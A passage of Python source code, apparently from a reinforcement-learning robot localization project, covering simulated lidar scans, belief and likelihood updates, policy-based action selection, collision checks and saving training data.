gtl = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) for i in range(self.grid_dirs): ret = return_dict[i] gtl[i,:,:] = ret['gtl'] return gtl def get_gt_likelihood_corr(self, ref_scans, clip=0): # start_time = time.time() manager = multiprocessing.Manager() return_dict = manager.dict() accum = 0 procs = [] for i_worker in range(min(self.args.n_workers, self.grid_dirs)): n_dirs = self.grid_dirs/self.args.n_workers if i_worker < self.grid_dirs % self.args.n_workers: n_dirs +=1 my_dirs = range(accum, accum+n_dirs) accum += n_dirs if len(my_dirs)>0: pro = multiprocessing.Process(target = self.get_gtl_corr_mp, args = [ref_scans, my_dirs, return_dict, clip]) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] for i in range(self.grid_dirs): ret = return_dict[i] self.gt_likelihood[i,:,:] = ret['gtl'] # self.gt_likelihood[i,:,:] = torch.tensor(ret['gtl']).float().to(self.device) def get_cosine_sim(self,x,y): # numpy arrays. return sum(x*y)/np.linalg.norm(y,2)/np.linalg.norm(x,2) def get_corr(self,x,y,clip=1): mx=np.mean(x) my=np.mean(y) corr=sum((x-mx)*(y-my))/np.linalg.norm(y-my,2)/np.linalg.norm(x-mx,2) # return 0.5*(corr+1.0) if clip==1: return np.clip(corr, 0, 1.0) else: return 0.5*(corr+1.0) def get_a_scan(self, x_real, y_real, offset=0, scan_step=1, noise=0, sigma=0): #class member variables: map_rows, map_cols, xlim, ylim, min_scan_range, max_scan_range, map_2d row_hd = to_index(x_real, self.map_rows, self.xlim) # from real to hd col_hd = to_index(y_real, self.map_cols, self.ylim) # from real to hd scan = np.zeros(360) missing = np.random.choice(360, noise, replace=False) gaussian_noise = np.random.normal(scale=sigma, size=360) for i_ray in xrange(0,360, scan_step): theta = math.radians(i_ray)+offset if i_ray in missing: dist = np.inf else: dist = self.min_scan_range while True: if dist >= self.max_scan_range: dist = np.inf break x_probe = x_real + dist * np.cos(theta) y_probe = y_real + dist * np.sin(theta) # see if there's something i_hd_prb = to_index(x_probe, self.map_rows, self.xlim) j_hd_prb = to_index(y_probe, self.map_cols, self.ylim) if i_hd_prb < 0 or i_hd_prb >= self.map_rows: dist = np.inf break if j_hd_prb < 0 or j_hd_prb >= self.map_cols: dist = np.inf break if self.map_for_LM[i_hd_prb, j_hd_prb] >= 0.5: break dist += 0.01+0.01*(np.random.rand()) scan[i_ray]=dist+gaussian_noise[i_ray] return scan def get_a_scan_mp(self, range_place, return_dict, offset=0, scan_step=1, map_img=None, xlim=None, ylim=None): # print (os.getpid(), min(range_place), max(range_place)) for i_place in range_place: #class member variables: map_rows, map_cols, xlim, ylim, min_scan_range, max_scan_range, map_2d row_ld = i_place // self.grid_cols col_ld = i_place % self.grid_cols x_real = to_real(row_ld, xlim, self.grid_rows ) # from low-dim location to real y_real = to_real(col_ld, ylim, self.grid_cols ) # from low-dim location to real row_hd = to_index(x_real, self.map_rows, xlim) # from real to hd col_hd = to_index(y_real, self.map_cols, ylim) # from real to hd scan = np.zeros(360) for i_ray in xrange(0,360, scan_step): theta = math.radians(i_ray)+offset dist = self.min_scan_range while True: if dist >= self.max_scan_range: dist = np.inf break x_probe = x_real + dist * np.cos(theta) y_probe = y_real + dist * np.sin(theta) # see if there's something i_hd_prb = to_index(x_probe, self.map_rows, xlim) j_hd_prb = to_index(y_probe, self.map_cols, ylim) if i_hd_prb < 0 or i_hd_prb >= self.map_rows: dist = np.inf break if j_hd_prb < 0 or j_hd_prb >= self.map_cols: dist = np.inf break if map_img[i_hd_prb, j_hd_prb] >= 0.5: break dist += 0.01+0.01*(np.random.rand()) scan[i_ray]=dist #return scan return_dict[i_place]={'scan':scan} # def get_synth_scan(self): # # start_time = time.time() # # place sensor at a location, then reach out in 360 rays all around it and record when each ray gets hit. # n_places=self.grid_rows * self.grid_cols # for i_place in range(n_places): # row_ld = i_place // self.grid_cols # col_ld = i_place % self.grid_cols # x_real = to_real(row_ld, self.xlim, self.grid_rows ) # from low-dim location to real # y_real = to_real(col_ld, self.ylim, self.grid_cols ) # from low-dim location to real # scan = self.get_a_scan(x_real, y_real,scan_step=self.args.pm_scan_step) # self.scans_over_map[row_ld, col_ld,:] = np.clip(scan, 1e-10, self.max_scan_range) # if i_place%10==0: print ('.') # # print ('scans', time.time()-start_time) def get_synth_scan_mp(self, scans, map_img=None, xlim=None, ylim=None): # print (multiprocessing.cpu_count()) # start_time = time.time() # place sensor at a location, then reach out in 360 rays all around it and record when each ray gets hit. n_places=self.grid_rows * self.grid_cols manager = multiprocessing.Manager() return_dict = manager.dict() procs = [] accum = 0 for worker in range(min(self.args.n_workers, n_places)): n_myplaces = n_places/self.args.n_workers if worker < n_places % self.args.n_workers: n_myplaces += 1 range_place = range(accum, accum+n_myplaces) accum += n_myplaces kwargs = {'scan_step': self.args.pm_scan_step, 'map_img':map_img, 'xlim':xlim, 'ylim':ylim} pro = multiprocessing.Process(target = self.get_a_scan_mp, args = [range_place, return_dict ], kwargs = kwargs) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] # scans = np.ndarray((self.grid_rows*self.grid_cols, 360)) for i_place in range(n_places): ### multi-processing rd = return_dict[i_place] scan = rd['scan'] # scans [i_place, :] = np.clip(scan, self.min_scan_range, self.max_scan_range) row_ld = i_place // self.grid_cols col_ld = i_place % self.grid_cols scans[row_ld, col_ld,:] = np.clip(scan, self.min_scan_range, self.max_scan_range) # self.scans_over_map[row_ld, col_ld,:] = np.clip(scan, self.min_scan_range, self.max_scan_range) def slide_scan(self): # slide scan_2d downward for self.front_margin_pixels, and then left/righ for collision radius self.scan_2d_slide = np.copy(self.scan_2d[0,:,:]) for i in range(self.front_margin_pixels): self.scan_2d_slide += shift(self.scan_2d_slide, 1, axis=0, fill=1.0) # self.scan_2d_slide = np.clip(self.scan_2d_slide,0.0,1.0) for i in range(self.side_margin_pixels): self.scan_2d_slide += shift(self.scan_2d_slide, +1, axis=1, fill=1.0) self.scan_2d_slide += shift(self.scan_2d_slide, -1, axis=1, fill=1.0) self.scan_2d_slide = np.clip(self.scan_2d_slide,0.0,1.0) def get_scan_2d_n_headings(self, scan_data, xlim, ylim): if self.args.verbose > 1: print('get_scan_2d_n_headings') data = scan_data if self.map_rows == None : return None, None if self.map_cols == None: return None, None O=self.grid_dirs N=self.map_rows M=self.map_cols scan_2d = np.zeros(shape=(O,N,M)) angles = np.linspace(data.angle_min, data.angle_max, data.ranges.size, endpoint=False) for i,dist in enumerate(data.ranges): for rotate in range(O): offset = 2*np.pi/O*rotate angle = offset + angles[i] if angle > math.radians(self.args.fov[0]) and angle < math.radians(self.args.fov[1]): continue if ~np.isinf(dist): x = (dist)*np.cos(angle) y = (dist)*np.sin(angle) n = to_index(x, N, xlim) m = to_index(y, M, ylim) if n>=0 and n<N and m>0 and m<M: scan_2d[rotate,n,m] = 1.0 rows1 = self.args.n_state_grids cols1 = self.args.n_state_grids rows2 = self.args.n_local_grids cols2 = rows2 center=self.args.n_local_grids/2 if self.args.binary_scan: scan_2d_low = np.ceil(normalize(cv2.resize(scan_2d[0,:,:], (rows1, cols1),interpolation=cv2.INTER_AREA))) else: scan_2d_low = normalize(cv2.resize(scan_2d[0,:,:], (rows1, cols1),interpolation=cv2.INTER_AREA)) return scan_2d, scan_2d_low def do_scan_2d_n_headings(self): if self.args.verbose > 1: print('get_scan_2d_n_headings') data = self.scan_data if self.map_rows == None : return if self.map_cols == None: return O=self.grid_dirs N=self.map_rows M=self.map_cols self.scan_2d = np.zeros(shape=(O,N,M)) angles = np.linspace(data.angle_min, data.angle_max, data.ranges.size, endpoint=False) for i,dist in enumerate(data.ranges): for rotate in range(O): offset = 2*np.pi/O*rotate angle = offset + angles[i] if angle > math.radians(self.args.fov[0]) and angle < math.radians(self.args.fov[1]): continue if ~np.isinf(dist): x = (dist)*np.cos(angle) y = (dist)*np.sin(angle) n = to_index(x, N, self.xlim) m = to_index(y, M, self.ylim) if n>=0 and n<N and m>0 and m<M: self.scan_2d[rotate,n,m] = 1.0 rows1 = self.args.n_state_grids cols1 = self.args.n_state_grids rows2 = self.args.n_local_grids cols2 = rows2 center=self.args.n_local_grids/2 if self.args.binary_scan: self.scan_2d_low = np.ceil(normalize(cv2.resize(self.scan_2d[0,:,:], (rows1, cols1),interpolation=cv2.INTER_AREA))) else: self.scan_2d_low = normalize(cv2.resize(self.scan_2d[0,:,:], (rows1, cols1),interpolation=cv2.INTER_AREA)) return def generate_data(self): # data index: D # n envs : E # n episodes: N # file-number(D) = D//N = E, # data index in the file = D % N # map file number = D//N = E index = "%05d"%(self.data_cnt) target_data = self.gt_likelihood_unnormalized range_data=np.array(self.scan_data.ranges) angle_array = np.linspace(self.scan_data.angle_min, self.scan_data.angle_max,range_data.size, endpoint=False) scan_data_to_save = np.stack((range_data,angle_array),axis=1) #first column: range, second column: angle self.target_list.append(target_data) self.scan_list.append(scan_data_to_save) if self.args.verbose > 2: print ("target_list", len(self.target_list)) print ("scan_list", len(self.scan_list)) if self.done: scans = np.stack(self.scan_list, axis=0) targets = np.stack(self.target_list, axis=0) np.save(os.path.join(self.data_path, 'scan-%s.npy'%index), scans) np.save(os.path.join(self.data_path, 'map-%s.npy'%index), self.map_for_LM) np.save(os.path.join(self.data_path, 'target-%s.npy'%index), targets) self.scan_list = [] self.target_list = [] self.data_cnt+=1 if args.verbose > 0: print ("%d: map %s, scans %s, targets %s"%(index, self.map_for_LM.shape, scans.shape, targets.shape )) return def stack_data(self): target_data = self.gt_likelihood_unnormalized range_data = np.array(self.scan_data.ranges_2pi, np.float32) angle_array = np.array(self.scan_data.angles_2pi, np.float32) scan_data_to_save = np.stack((range_data,angle_array),axis=1) #first column: range, second column: angle self.target_list.append(target_data) self.scan_list.append(scan_data_to_save) if self.args.verbose > 2: print ("target_list", len(self.target_list)) print ("scan_list", len(self.scan_list)) def save_generated_data(self): scans = np.stack(self.scan_list, axis=0) targets = np.stack(self.target_list, axis=0) np.save(os.path.join(self.data_path, 'scan-%05d.npy'%self.data_cnt), scans) np.save(os.path.join(self.data_path, 'map-%05d.npy'%self.data_cnt), self.map_for_LM) np.save(os.path.join(self.data_path, 'target-%05d.npy'%self.data_cnt), targets) if args.verbose > 0: print ("%05d: map %s, scans %s, targets %s"%(self.data_cnt, self.map_for_LM.shape, scans.shape, targets.shape )) self.scan_list = [] self.target_list = [] self.data_cnt+=1 def collect_data(self): # ENV-EPI-STP-CNT # map, scan, belief, likelihood, GTL, policy, action, reward # input = [map, scan] # target = [GTL] # state = [map-low-dim, bel, scan-low-dim] # action_reward = [action, p0, p1, p2, reward] # index = "%03d-%03d-%03d-%04d"%(self.env_count,self.episode_count,self.step_count,self.data_cnt) index = "%05d"%(self.data_cnt) env_index = "%05d"%(self.env_count) with open(self.rollout_list,'a') as ro: ro.write('%d %d %d %d\n'%(self.env_count,self.episode_count,self.step_count,self.data_cnt)) map_file = os.path.join(self.data_path, 'map-%s.npy'%env_index) if not os.path.isfile(map_file): #save the map np.save(map_file, self.map_for_LM) target_data = self.gt_likelihood_unnormalized gt_pose = np.array((self.true_grid.head,self.true_grid.row,self.true_grid.col)).reshape(1,-1) map_num = np.array([self.env_count]) range_data=np.array(self.scan_data.ranges) angle_array = np.linspace(self.scan_data.angle_min, self.scan_data.angle_max,range_data.size, endpoint=False) scan_data_to_save = np.stack((range_data,angle_array),axis=1) #first column: range, second column: angle real_pose = np.array((self.current_pose.theta, self.current_pose.x, self.current_pose.y)).reshape(1,-1) dict_to_save = {'scan':scan_data_to_save, 'mapindex':map_num, 'target':target_data, 'belief': self.belief.detach().cpu().numpy(), 'like':self.likelihood.detach().cpu().numpy(), 'action': self.action_idx, 'prob':self.prob.reshape(1,-1), 'reward': self.reward_vector.reshape(1,-1), 'gt_pose': gt_pose, 'real_pose': real_pose} np.save(os.path.join(self.data_path, 'data-%s.npy'%index), dict_to_save) self.data_cnt+=1 return def compute_gtl(self, ref_scans): if self.args.gtl_off == True: gt = np.random.rand(self.grid_dirs, self.grid_rows, self.grid_cols) gt = np.clip(gt, 1e-5, 1.0) gt=gt/gt.sum() self.gt_likelihood = gt # self.gt_likelihood = torch.tensor(gt).float().to(self.device) else: if self.args.gtl_src == 'hd-corr': self.get_gt_likelihood_corr(ref_scans, clip=0) elif self.args.gtl_src == 'hd-corr-clip': self.get_gt_likelihood_corr(ref_scans, clip=1) elif self.args.gtl_src == 'hd-cos': self.gt_likelihood = self.get_gt_likelihood_cossim(ref_scans, self.scan_data_at_unperturbed) else: raise Exception('GTL source required: --gtl-src= [low-dim-map, high-dim-map]') self.normalize_gtl() def run_action_module(self): if self.args.random_policy: fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: num_actions = 2 else: num_actions = 3 self.action_from_policy = np.random.randint(num_actions) self.action_str = self.action_space[self.action_from_policy] else: mark_time = time.time() self.get_action() print('[ACTION] %.3f sec '%(time.time()-mark_time)) if self.args.figure: # update part of figure after getting action self.ax_map.set_title('action(%d):%s'%(self.step_count,self.action_str)) ax = self.ax_act self.update_act_dist(ax) ax=self.ax_rew act_lttr=['L','R','F','-'] self.obj_rew= self.update_list(ax,self.rewards,self.obj_rew,"Reward", text=act_lttr[self.action_idx]) ax=self.ax_err self.obj_err = self.update_list(ax,self.xyerrs,self.obj_err,"Error") mark_time = time.time() plt.pause(1e-4) print('[TIME for PAUSE FIGURE] %.3f sec '%(time.time()-mark_time)) self.sample_action() if self.args.figure: # update part of figure after getting action self.ax_map.set_title('action(%d):%s'%(self.step_count,self.action_str)) mark_time = time.time() self.save_figure() print('[TIME for SAVE FIGURE] %.3f sec '%(time.time()-mark_time)) def update_likelihood_rotate(self, map_img, scan_imgs, compute_loss=True): map_img = map_img.copy() if self.args.flip_map > 0: locs = np.random.randint(0, map_img.shape[0], (2, np.random.randint(self.args.flip_map+1))) xs = locs[0] ys = locs[1] map_img[xs,ys]=1-map_img[xs,ys] if self.perceptual_model == None: return self.likelihood else: likelihood = torch.zeros((self.grid_dirs,self.grid_rows, self.grid_cols), device=torch.device(self.device), dtype=torch.float) if self.args.verbose>1: print("update_likelihood_rotate") if self.args.ch3=="ZERO": input_batch = np.zeros((self.grid_dirs, 3, self.map_rows, self.map_cols)) for i in range(self.grid_dirs): # for all orientations input_batch[i, 0, :,:] = map_img input_batch[i, 1, :,:] = scan_imgs[i,:,:] input_batch[i, 2, :,:] = np.zeros_like(map_img) elif self.args.ch3=="RAND": input_batch = np.zeros((self.grid_dirs, 3, self.map_rows, self.map_cols)) for i in range(self.grid_dirs): # for all orientations input_batch[i, 0, :,:] = map_img input_batch[i, 1, :,:] = scan_imgs[i,:,:] input_batch[i, 2, :,:] = np.random.random(map_img.shape) else: input_batch = np.zeros((self.grid_dirs, 2, self.map_rows, self.map_cols)) for i in range(self.grid_dirs): # for all orientations input_batch[i, 0, :,:] = map_img input_batch[i, 1, :,:] = scan_imgs[i,:,:] input_batch = torch.from_numpy(input_batch).float() output = self.perceptual_model.forward(input_batch) output_softmax = F.softmax(output.view([1,-1])/self.args.temperature, dim= 1) # shape (1,484) if self.args.n_lm_grids != self.args.n_local_grids: # LM output size != localization space size: adjust LM output to fit to localization space. nrows = self.args.n_lm_grids #self.grid_rows/self.args.sub_resolution ncols = self.args.n_lm_grids #self.grid_cols/self.args.sub_resolution like = output_softmax.cpu().detach().numpy().reshape((self.grid_dirs, nrows, ncols)) for i in range(self.grid_dirs): likelihood[i,:,:] = torch.tensor(cv2.resize(like[i,:,:], (self.grid_rows,self.grid_cols))).float().to(self.device) likelihood /= likelihood.sum() else: likelihood = output_softmax.reshape(likelihood.shape) del output_softmax, input_batch, output if compute_loss: self.compute_loss(likelihood) return likelihood # self.likelihood = torch.clamp(self.likelihood, 1e-9, 1.0) # self.likelihood = self.likelihood/self.likelihood.sum() def compute_loss(self, likelihood): gtl = torch.tensor(self.gt_likelihood).float().to(self.device) if self.args.pm_loss == "KL": self.loss_ll = (gtl * torch.log(gtl/likelihood)).sum() elif self.args.pm_loss == "L1": self.loss_ll = torch.abs(likelihood - gtl).sum() if self.args.update_pm_by=="GTL" or self.args.update_pm_by=="BOTH": if len(self.loss_likelihood) < self.args.pm_batch_size: self.loss_likelihood.append(self.loss_ll) if self.args.verbose > 2: print ("loss_likelihood", len(self.loss_likelihood)) if len(self.loss_likelihood) >= self.args.pm_batch_size: self.back_prop_pm() self.loss_likelihood = [] del gtl def mask_likelihood(self): the_mask = torch.tensor(np.ones([self.grid_dirs, self.grid_rows, self.grid_cols])).float().to(self.device) for i in range(self.grid_rows): for j in range(self.grid_cols): if self.map_for_pose[i, j]>0.5: the_mask[:,i,j]=0.0 self.likelihood = self.likelihood * the_mask #self.likelihood = torch.clamp(self.likelihood, 1e-9, 1.0) self.likelihood = self.likelihood/self.likelihood.sum() def product_belief(self): if self.args.verbose>1: print("product_belief") # back up prior belief if self.args.use_gt_likelihood : # gt = torch.from_numpy(self.gt_likelihood/self.gt_likelihood.sum()).float().to(self.divice) gt = torch.tensor(self.gt_likelihood).float().to(self.device) self.belief = self.belief * (gt) #self.belief = self.belief * (self.gt_likelihood) else: self.belief = self.belief * (self.likelihood) #normalize belief self.belief /= self.belief.sum() #update bel_grid guess = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) self.bel_grid = Grid(head=guess[0],row=guess[1],col=guess[2]) def do_the_honors(self, pose, belief): scan_data = self.get_virtual_lidar(pose) scan_2d, _ = self.get_scan_2d_n_headings(scan_data, self.xlim, self.ylim) if self.args.use_gt_likelihood: gtl = self.get_gt_likelihood_cossim(self.scans_over_map, scan_data) likelihood = softmax(gtl, self.args.temperature) likelihood = torch.tensor(likelihood).float().to(self.device) else: likelihood = self.update_likelihood_rotate(self.map_for_LM, scan_2d, compute_loss=False) bel = belief * likelihood bel /= bel.sum() new_bel_ent = float((bel * torch.log(bel)).sum()) return new_bel_ent - self.bel_ent def get_markov_action(self): max_ent_diff = -np.inf sampled_action_str = "" # update belief entropy self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: action_space = ['turn_left','turn_right'] else: action_space = ['turn_left','turn_right','go_fwd'] for afp, action_str in enumerate(action_space): virtual_target = self.get_virtual_target_pose(action_str) ### transit the belief according to the action bel = self.belief.cpu().detach().numpy() # copy current belief into numpy bel = self.trans_bel(bel, action_str) # transition off the actual trajectory bel = torch.from_numpy(bel).float().to(self.device)#$ requires_grad=True) ent_diff = self.do_the_honors(virtual_target, bel) if ent_diff > max_ent_diff: max_ent_diff = ent_diff sampled_action_str = action_str self.action_str = sampled_action_str self.action_from_policy = afp def get_action(self): if self.args.markov: self.get_markov_action() return if self.args.verbose>1: print("get_action") if self.step_count==0: self.cx = torch.zeros(1, 256) self.hx = torch.zeros(1, 256) # self.cx = Variable(torch.zeros(1, 256)) # self.hx = Variable(torch.zeros(1, 256)) else: # these are internal states of LSTM. not for back-prop. so, detach them. self.cx = self.cx.detach() #Variable(self.cx.data) self.hx = self.hx.detach() #Variable(self.hx.data) self.scan_2d_low_tensor[0,:,:]=torch.from_numpy(self.scan_2d_low).float().to(self.device) # state = torch.cat((self.map_for_RL.detach(), self.belief, self.scan_2d_low_tensor.detach()), dim=0) if self.args.n_state_grids == self.args.n_local_grids and self.args.n_state_dirs == self.args.n_headings: # no downsample. preserve the path for backprop belief_downsample = self.belief else: belief_downsample = np.zeros((self.args.n_state_dirs, self.args.n_state_grids, self.args.n_state_grids)) dirs = range(self.bel_grid.head%(self.grid_dirs/self.args.n_state_dirs),self.grid_dirs,self.grid_dirs/self.args.n_state_dirs) for i,j in enumerate(dirs): bel = self.belief[j,:,:].cpu().detach().numpy() bel = cv2.resize(bel, (self.args.n_state_grids,self.args.n_state_grids))#,interpolation=cv2.INTER_NEAREST) belief_downsample[i,:,:] = bel belief_downsample /= belief_downsample.sum() belief_downsample = torch.from_numpy(belief_downsample).float().to(self.device) if self.args.n_state_grids == self.args.n_local_grids and self.args.n_state_dirs == self.args.n_headings: # no downsample. preserve the path for backprop likelihood_downsample = self.likelihood else: likelihood_downsample = np.zeros((self.args.n_state_dirs, self.args.n_state_grids, self.args.n_state_grids)) dirs = range(self.bel_grid.head%(self.grid_dirs/self.args.n_state_dirs),self.grid_dirs,self.grid_dirs/self.args.n_state_dirs) for i,j in enumerate(dirs): lik = self.likelihood[j,:,:].cpu().detach().numpy() lik = cv2.resize(lik, (self.args.n_state_grids,self.args.n_state_grids))#,interpolation=cv2.INTER_NEAREST) likelihood_downsample[i,:,:] = lik likelihood_downsample /= likelihood_downsample.sum() likelihood_downsample = torch.from_numpy(likelihood_downsample).float().to(self.device) ## map_for_RL : resize it: n_maze_grids --> n_state_grids ## scan_2d_low_tensor: n_state_grids if self.args.RL_type == 0: state = torch.cat((self.map_for_RL.detach(), belief_downsample, self.scan_2d_low_tensor.detach()), dim=0) elif self.args.RL_type == 1: state = torch.cat((belief_downsample, self.scan_2d_low_tensor.detach()), dim=0) elif self.args.RL_type == 2: state = torch.cat((belief_downsample, likelihood_downsample), dim=0) state2 = torch.stack((torch.from_numpy(self.map_for_LM.astype(np.float32)), torch.from_numpy(self.scan_2d_slide.astype(np.float32))), dim=0) if self.args.update_pm_by=="BOTH" or self.args.update_pm_by=="RL": if self.args.RL_type == 2: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.unsqueeze(0), state2.unsqueeze(0), (self.hx, self.cx))) else: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.unsqueeze(0), (self.hx, self.cx))) else: if self.args.RL_type == 2: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.detach().unsqueeze(0), state2.detach().unsqueeze(0), (self.hx, self.cx))) else: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.detach().unsqueeze(0), (self.hx, self.cx))) #state.register_hook(print) prob = F.softmax(logit, dim=1) log_prob = F.log_softmax(logit, dim=1) entropy = -(log_prob * prob).sum(1, keepdim=True) if self.optimizer != None: self.entropies.append(entropy) if self.args.verbose>2: print ("entropies", len(self.entropies)) #argmax for action if self.args.action == 'argmax' or self.rl_test: action = [[torch.argmax(prob)]] action = torch.as_tensor(action)#, device=self.device) elif self.args.action == 'multinomial': #multinomial sampling for action # prob = torch.clamp(prob, 1e-10, 1.0) if self.args.update_rl == False: fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: prob[0,2]=0 action = prob.multinomial(num_samples=1) #.cpu().detach() else: raise Exception('action sampling method required') self.prob=prob.cpu().detach().numpy() #action = sample(logit) #log_prob = log_prob.gather(1, Variable(action)) log_prob = log_prob.gather(1, action) #print ('1:%f, 2:%f'%(log_prob.gather(1,action), log_prob[0,action])) # if self.args.detach_models == True: # intri_reward = self.intri_model(Variable(state.unsqueeze(0)), action) # else: # intri_reward = self.intri_model(state.unsqueeze(0), action) # self.intri_rewards.append(intri_reward) if self.optimizer != None: self.values.append(value) self.log_probs.append(log_prob) if self.args.verbose > 2: print ("values", len(self.values)) print ("log_probs", len(self.log_probs)) #self.log_probs.append(log_prob[0,action]) self.action_str = self.action_space[action.item()] self.action_from_policy = action.item() del state, log_prob, value, action, belief_downsample, entropy, prob def sample_action(self): if self.args.manual_control: action = -1 while action < 0: print ("suggested action: %s"%self.action_str) if self.args.num_actions == 4: keyin = raw_input ("[f]orward/[l]eft/[r]ight/[h]old/[a]uto/[c]ontinue/[n]ext_ep/[q]uit: ") elif self.args.num_actions == 3: keyin = raw_input ("[f]orward/[l]eft/[r]ight/[a]uto/[c]ontinue/[n]ext_ep/[q]uit: ") if keyin == "f": action = 2 elif keyin == "l": action = 0 elif keyin == "r": action = 1 elif keyin == "h" and self.args.num_actions == 4: action = 3 elif keyin == "a": action = self.action_from_policy elif keyin == "c": self.args.manual_control = False action = self.action_from_policy elif keyin == "n": self.skip_to_end = True self.step_count = self.step_max-1 action = self.action_from_policy elif keyin == "q": self.quit_sequence() self.action_idx = action self.action_str = self.action_space[self.action_idx] else: self.action_idx = self.action_from_policy self.action_str = self.action_space[self.action_idx] def quit_sequence(self): self.wrap_up() if self.args.jay1 or self.args.gazebo: rospy.logwarn("Quit") rospy.signal_shutdown("Quit") exit() def get_virtual_target_pose(self, action_str): start_pose = Pose2d(0,0,0) start_pose.x = self.believed_pose.x start_pose.y = self.believed_pose.y start_pose.theta = self.believed_pose.theta goal_pose = Pose2d(0,0,0) offset = self.heading_resol*self.args.rot_step if action_str == "turn_right": goal_pose.theta = wrap(start_pose.theta-offset) goal_pose.x = start_pose.x goal_pose.y = start_pose.y elif action_str == "turn_left": goal_pose.theta = wrap(start_pose.theta+offset) goal_pose.x = start_pose.x goal_pose.y = start_pose.y elif action_str == "go_fwd": goal_pose.x = start_pose.x + math.cos(start_pose.theta)*self.fwd_step_meters goal_pose.y = start_pose.y + math.sin(start_pose.theta)*self.fwd_step_meters goal_pose.theta = start_pose.theta elif action_str == "hold": return start_pose else: print('undefined action name %s'%action_str) exit() return goal_pose def update_target_pose(self): self.last_pose.x = self.perturbed_goal_pose.x self.last_pose.y = self.perturbed_goal_pose.y self.last_pose.theta = self.perturbed_goal_pose.theta self.start_pose.x = self.believed_pose.x self.start_pose.y = self.believed_pose.y self.start_pose.theta = self.believed_pose.theta offset = self.heading_resol*self.args.rot_step if self.action_str == "turn_right": self.goal_pose.theta = wrap(self.start_pose.theta-offset) self.goal_pose.x = self.start_pose.x self.goal_pose.y = self.start_pose.y elif self.action_str == "turn_left": self.goal_pose.theta = wrap(self.start_pose.theta+offset) self.goal_pose.x = self.start_pose.x self.goal_pose.y = self.start_pose.y elif self.action_str == "go_fwd": self.goal_pose.x = self.start_pose.x + math.cos(self.start_pose.theta)*self.fwd_step_meters self.goal_pose.y = self.start_pose.y + math.sin(self.start_pose.theta)*self.fwd_step_meters self.goal_pose.theta = self.start_pose.theta elif self.action_str == "hold": return else: print('undefined action name %s'%self.action_str) exit() delta_x, delta_y = 0,0 delta_theta = 0 if self.args.process_error[0]>0 or self.args.process_error[1]>0: delta_x, delta_y = np.random.normal(scale=self.args.process_error[0],size=2) delta_theta = np.random.normal(scale=self.args.process_error[1]) if self.args.verbose > 1: print ('%f, %f, %f'%(delta_x, delta_y, math.degrees(delta_theta))) self.perturbed_goal_pose.x = self.goal_pose.x+delta_x self.perturbed_goal_pose.y = self.goal_pose.y+delta_y self.perturbed_goal_pose.theta = wrap(self.goal_pose.theta+delta_theta) def collision_fnc(self, x, y, rad, img): corner0 = [x+rad,y+rad] corner1 = [x-rad,y-rad] x0 = to_index(corner0[0], self.map_rows, self.xlim) y0 = to_index(corner0[1], self.map_cols, self.ylim) x1 = to_index(corner1[0], self.map_rows, self.xlim) y1 = to_index(corner1[1], self.map_cols, self.ylim) if x0 < 0 : return True if y0 < 0: return True if x1 >= self.map_rows: return True if y1 >= self.map_cols: return True # x0 = max(0, x0) # y0 = max(0, y0) # x1 = min(self.map_rows-1, x1) # y1 = min(self.map_cols-1, y1) if rad == 0: if img[x0, y0] > 0.5 : return True else: return False else: pass for ir in range(x0,x1+1): for ic in range(y0,y1+1): dx = to_real(ir, self.xlim, self.map_rows) - x dy = to_real(ic, self.ylim, self.map_cols) - y dist = np.sqrt(dx**2+dy**2) if dist <= rad and img[ir,ic]==1.0: return True return False def collision_check(self): row=to_index(self.perturbed_goal_pose.x, self.grid_rows, self.xlim) col=to_index(self.perturbed_goal_pose.y, self.grid_cols, self.ylim) x = self.perturbed_goal_pose.x y = self.perturbed_goal_pose.y rad = self.collision_radius if self.args.collision_from == "scan" and self.action_str == "go_fwd": self.collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) elif self.args.collision_from == "map": self.collision = self.collision_fnc(x,y,rad, self.map_for_LM) else: self.collision = False if self.collision: self.collision_pose.x = self.perturbed_goal_pose.x self.collision_pose.y = self.perturbed_goal_pose.y self.collision_pose.theta = self.perturbed_goal_pose.theta self.collision_grid.row = row self.collision_grid.col = col self.collision_grid.head = self.true_grid.head if self.collision: #undo update target self.perturbed_goal_pose.x = self.last_pose.x self.perturbed_goal_pose.y = self.last_pose.y self.perturbed_goal_pose.theta = self.last_pose.theta def get_virtual_lidar(self, current_pose): ranges = self.get_a_scan(current_pose.x, current_pose.y, offset=current_pose.theta) bearing_deg = np.arange(360.0) mindeg=0 maxdeg=359 incrementdeg=1 params = {'ranges': ranges, 'angle_min': math.radians(mindeg), 'angle_max': math.radians(maxdeg), 'range_min': self.min_scan_range, 'range_max': self.max_scan_range} scan_data = Lidar(**params) return scan_data def get_lidar(self): mindeg=0 maxdeg=359 if self.args.gazebo: params = {'ranges': self.raw_scan.ranges, 'angle_min': self.raw_scan.angle_min, 'angle_max': self.raw_scan.angle_max, 'range_min': self.raw_scan.range_min, 'range_max': self.raw_scan.range_max} elif self.args.jay1: params = {'ranges': self.raw_scan.ranges, 'angle_min': self.raw_scan.angle_min, 'angle_max': self.raw_scan.angle_max, 'range_min': self.raw_scan.range_min, 'range_max': self.raw_scan.range_max} else: ranges = self.get_a_scan(self.current_pose.x, self.current_pose.y, offset=self.current_pose.theta, noise=self.args.lidar_noise) # bearing_deg = np.arange(360.0) # incrementdeg=1 params = {'ranges': ranges, 'angle_min': math.radians(mindeg), 'angle_max': math.radians(maxdeg), 'range_min': self.min_scan_range, 'range_max': self.max_scan_range} self.scan_data = Lidar(**params) if self.args.gazebo or self.args.jay1: params = {'ranges': self.raw_scan.ranges, 'angle_min': self.raw_scan.angle_min, 'angle_max': self.raw_scan.angle_max, 'range_min': self.raw_scan.range_min, 'range_max': self.raw_scan.range_max} ## it's same as the actual scan. self.scan_data_at_unperturbed = Lidar(**params) else: ## scan_data @ unperturbed pose x = to_real(self.true_grid.row, self.xlim, self.grid_rows) y = 